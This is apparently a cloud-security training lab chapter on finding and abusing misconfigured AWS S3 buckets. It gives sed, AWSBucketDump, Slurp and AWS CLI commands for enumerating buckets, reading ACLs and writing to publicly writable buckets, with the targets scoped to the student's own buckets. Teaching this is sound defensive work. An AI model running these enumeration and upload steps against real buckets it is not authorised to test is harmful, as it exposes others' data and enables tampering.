Abusing AWS S3 misconfigurations
Introduction
AWS S3 is an object storage service from Amazon that can store any kind of file. Permissions can then be granted per object and per bucket.
More often than not, AWS S3 buckets are discovered with weak permissions on individual objects or on the bucket itself. Files and folders that should not be public are made world readable and available to anyone for inspection.
What are we going to cover?
This chapter covers common attacks against misconfigured buckets and the data leaks that can result from them.
Steps to setup lab
Run the following script in student VM to set up the target environment
If you see any error, please inform one of the trainers
We will use the following dictionary to search for S3 buckets
Make a backup of the BucketNames.txt file, just in case we mess up the file while doing the search and replace in the next section :)
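One way to take that backup is a plain copy. The file and backup names below assume BucketNames.txt sits in your current directory; adjust the path to match your lab setup.

```shell
# Keep a pristine copy before we rewrite the wordlist in place.
cp BucketNames.txt BucketNames.txt.bak
```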
Add '-unique-name-awscloudsec' to the end of every line in the dictionary, replacing unique-name with your own unique name. This ensures your dictionary can be used to attack and find your own buckets on the Internet, not someone else's. You can do this with sed
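A possible sed one-liner, assuming GNU sed and the suffix `-unique-name-awscloudsec` (substitute your own name):

```shell
# Append the suffix at the end ($) of every line, editing the file in place.
sed -i 's/$/-unique-name-awscloudsec/' BucketNames.txt
```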
Steps to attack
We will use AWSBucketDump to complete this exercise, although any other tool that can fetch bucket information would do. A great alternative is Digi Ninja's bucket_finder Ruby script.
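A minimal invocation sketch for bucket_finder, assuming the script takes a wordlist of candidate bucket names as its first argument (check the project's README for the exact options in your version):

```shell
# Point bucket_finder at the same wordlist of candidate bucket names.
ruby bucket_finder.rb BucketNames.txt
```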
Open Terminal and navigate to the ~/tools/AWSBucketDump folder
Create a zero-byte grep file and provide it to AWSBucketDump. AWSBucketDump uses this file to grep through the results, but since we create a 0-byte file here, it will show everything (which is what we want).
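The empty grep file and the AWSBucketDump invocation might look like the following. The flag names are from the tool's help output; run `python AWSBucketDump.py -h` to confirm them on your version.

```shell
# An empty grep file means "match everything".
touch grep.txt
# -l: list of candidate bucket names, -g: grep-words file
python AWSBucketDump.py -l BucketNames.txt -g grep.txt
```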
Kill the script once it reaches the end of the file and is stuck.
To see the results, open interesting_file.txt and review the discovered content.
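From the same folder, the results file can be printed directly:

```shell
# Print the hits AWSBucketDump recorded during the run.
cat interesting_file.txt
```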
Did you find anything interesting in the bucket(s)?
Bucket hunting on Steroids
Slurp is an advanced and versatile tool for Amazon S3 bucket enumeration. It supports several enumeration techniques, including permutation-based enumeration. As Slurp is written in Go, it is blazing fast, and it ships as a single portable binary.
Slurp supports the following techniques for enumerating S3 buckets -
Permutations - Similar to other S3 enumeration tools where buckets are discovered using known patterns
AWS Credentials - Slurp can use existing AWS credentials to discover any misconfigured buckets in the AWS account those credentials belong to
Domain - Discovers S3 buckets using a domain name
Slurp - DEMO
keyword mode
domain mode
internal mode (Using AWS credentials)
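The three modes map to commands roughly like the following. The subcommand and flag names are taken from slurp's README, so confirm them with `slurp -h`; `mykeyword` and `example.com` are placeholders.

```shell
# Keyword mode: permutation-based enumeration around a keyword
slurp keyword -t mykeyword
# Domain mode: derive candidate bucket names from a domain name
slurp domain -t example.com
# Internal mode: audit buckets visible to the credentials in ~/.aws/credentials
slurp internal
```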
For this technique to work, make sure at least one profile is configured under ~/.aws/credentials
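A profile in ~/.aws/credentials is a short INI section; the key values below are placeholders, not real credentials:

```ini
[default]
aws_access_key_id = AKIA...
aws_secret_access_key = ...
```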
Additional exercise - Writing data to a bucket
Enumerate a bucket's ACL using the command
For example
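A sketch of that command, with a placeholder bucket name:

```shell
# Query the bucket's ACL; add --no-sign-request if you have no credentials
# configured and the ACL itself is world-readable.
aws s3api get-bucket-acl --bucket target-bucket-unique-name-awscloudsec
```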
For S3 buckets that have public read AND write access, the output will contain a grant with the permission set to "FULL_CONTROL".
You can write to such a bucket using the credentials of any AWS account in the world, as shown below. The command attempts to upload a file called readme.txt using the credentials of a user added to your AWS CLI profiles.
You can see if the file has been uploaded using
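The upload and the follow-up listing could look like this. Here `attacker` is an assumed profile name for any AWS account you control, and the bucket name is a placeholder.

```shell
echo "poc - uploaded during lab exercise" > readme.txt
# Upload using any valid AWS credentials, not the bucket owner's
aws s3 cp readme.txt s3://target-bucket-unique-name-awscloudsec/ --profile attacker
# Verify the object landed in the bucket
aws s3 ls s3://target-bucket-unique-name-awscloudsec/ --profile attacker
```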
Additional references